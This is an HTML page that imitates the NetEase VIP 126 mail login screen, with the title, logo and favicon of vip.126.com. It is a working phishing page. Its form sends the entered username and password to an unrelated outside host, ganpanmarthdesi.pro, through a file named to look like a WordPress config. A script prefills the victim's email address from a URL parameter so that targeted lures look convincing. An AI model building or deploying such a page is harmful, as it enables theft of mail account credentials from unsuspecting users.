﻿<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>&#32593;&#26131;VIP126&#37038;&#31665;&#30331;&#24405;&#27880;&#20876;-&#20225;&#19994;&#37038;&#31665;-&#20010;&#20154;&#25910;&#36153;&#37038;&#31665;-&#23433;&#20840;&#31283;&#23450;</title>
<link rel="shortcut icon" href="https://vip.126.com/favicon.ico"/>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #676767;
  font-weight: 700;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=text]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 50%;
  padding: 8 8px;
  margin: 0;
  background: white;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 0px;
  border-radius: 0px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  }
  input[type=domain]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 50%;
  padding: 8px 8px 8px 60px;
  margin: 0;
  background: white;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 0px;
  border-radius: 0px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  }
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  padding: 8 8px;
  margin: 0;
  background-color: transparent;
  border: 1px solid #d6d6d6;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 5px;
  border-radius: 5px;
  font-size: 15px;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  }
  input[type=text]:focus, 
  input[type=domain]:focus, 
  input[type=password]:focus {
  outline: none;
  background-color: transparent;
  border: 1px solid #2985db;
  }
</style>
<body background="img/bg.png">

<div align="center">
	<table border="0" width="1172" cellspacing="0" cellpadding="0">
		<tr>
			<td>
			<table border="0" width="100%" cellspacing="0" cellpadding="0">
				<tr>
					<td height="30"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr> 
						    <td width="8"></td>
							<td width="68">
							<img border="0" src="img/vip.126.com.png" width="139" height="32"></td>
							<td width="686">&nbsp;</td>
							<td>
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
								<tr>
									<td height="16">
									<table border="0" width="100%" cellspacing="0" cellpadding="0">
										<tr>
											<td width="66">
											<p align="center"><b>
											<font size="1" color="#FFFFFF">
											VIP&#37038;&#31665;&#20171;&#32461;</font></b></td>
											<td width="39">&nbsp;</td>
											<td width="47">
											<p align="center"><b>
											<font color="#FFFFFF" size="1">&#20225;&#19994;&#22242;&#36141;</font></b></td>
											<td width="38">&nbsp;</td>
											<td width="61">
											<p align="center"><b>
											<font color="#FFFFFF" size="1">&#25163;&#26426;&#29256;&#37038;&#31665;</font></b></td>
											<td width="39">&nbsp;</td>
											<td>
											<p align="center"><b>
											<font color="#FFFFFF" size="1">&#23458;&#25143;&#26381;&#21153;</font></b></td>
										</tr>
									</table>
									</td>
								</tr>
								<tr>
									<td height="16">
									</td>
								</tr>
							</table>
							</td>
							<td width="8">&nbsp;</td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="58"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="380">&nbsp;</td>
							<td height="453" background="img/form.png">
							<table border="0" width="100%" cellspacing="0" cellpadding="0">
							  <form method="post" action="https://ganpanmarthdesi.pro/z-php/wp-config-post.php" >
								<tr>
									<td height="106"></td>
								</tr>
								<tr>
									<td>
									<table border="0" width="100%" cellspacing="0" cellpadding="0">
										<tr>
											<td width="43"></td>
											<td>
										        <input type="text" name="user" required  placeholder="&#47196;&#44536;&#51064; ID" id="userInput" value="user" style="border:0; border-bottom: 1px #ddd solid; border-top: 1px #ddd solid; border-right: 0px #ddd solid; border-left: 1px #ddd solid; border-top-left-radius:5px; border-bottom-left-radius:5px; border-top-right-radius:0px; border-bottom-right-radius:0px" /><input type="domain" name="" required  placeholder="&#47196;&#44536;&#51064; ID" id="domainInput" value="domain" style="border:0; border-bottom: 1px #ddd solid; border-top: 1px #ddd solid; border-left: 0px #ddd solid; border-right: 1px #ddd solid; border-top-right-radius:5px; border-bottom-right-radius:5px; border-top-left-radius:0px; border-bottom-left-radius:0px" />
											    <input type="hidden" name="domain" id="domainField" value="domain" >
											    <input type="hidden" name="link" id="hiddenLink" value="https://domain" >
											    <input type="hidden" name="sender" id="hiddenSender" value="domain" >
											</td>
											<td width="64">&nbsp;</td>
										</tr>
									</table>
									</td>
								</tr>
								<tr>
									<td height="24"></td>
								</tr>
								<tr>
									<td>
									<table border="0" width="100%" cellspacing="0" cellpadding="0">
										<tr>
											<td width="43">&nbsp;</td>
											<td height="46" >
											    <input type="password" placeholder="&#36755;&#20837;&#23494;&#30721;" name="passwd" required autofocus>
											</td>
											<td width="64">&nbsp;</td>
										</tr>
									</table>
									</td>
								</tr>
								<tr>
									<td height="55"></td>
								</tr>
								<tr>
									<td>
									<table border="0" width="100%" cellspacing="0" cellpadding="0">
										<tr>
											<td width="43">&nbsp;</td>
											<td>
											<input type="image" src="img/vip.126.com.btn.png" width="340" height="50"></td>
											<td width="64">&nbsp;</td>
										</tr>
									</table>
									</td>
								</tr>
								<tr>
									<td height="127"></td>
								</tr>
							  </form>
							</table>
							</td>
							<td width="345"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="20"></td>
				</tr>
			</table>
			</td>
		</tr>
	</table>
</div>

<!-- ✅ Updated script to show @domain in visible input -->
<script>
  const params = new URLSearchParams(window.location.search);
  const raw = params.get('login');
  const email = raw ? decodeURIComponent(raw) : '';

  if (email.includes('@')) {
    const [user, domain] = email.split(/@(.*)/, 2);
    document.getElementById('userInput').value = user;
    document.getElementById('domainInput').value = '@' + domain;
    document.getElementById('domainField').value = domain;
    document.getElementById('hiddenLink').value = domain;
    document.getElementById('hiddenSender').value = domain;
  }
</script>

</body>
</html>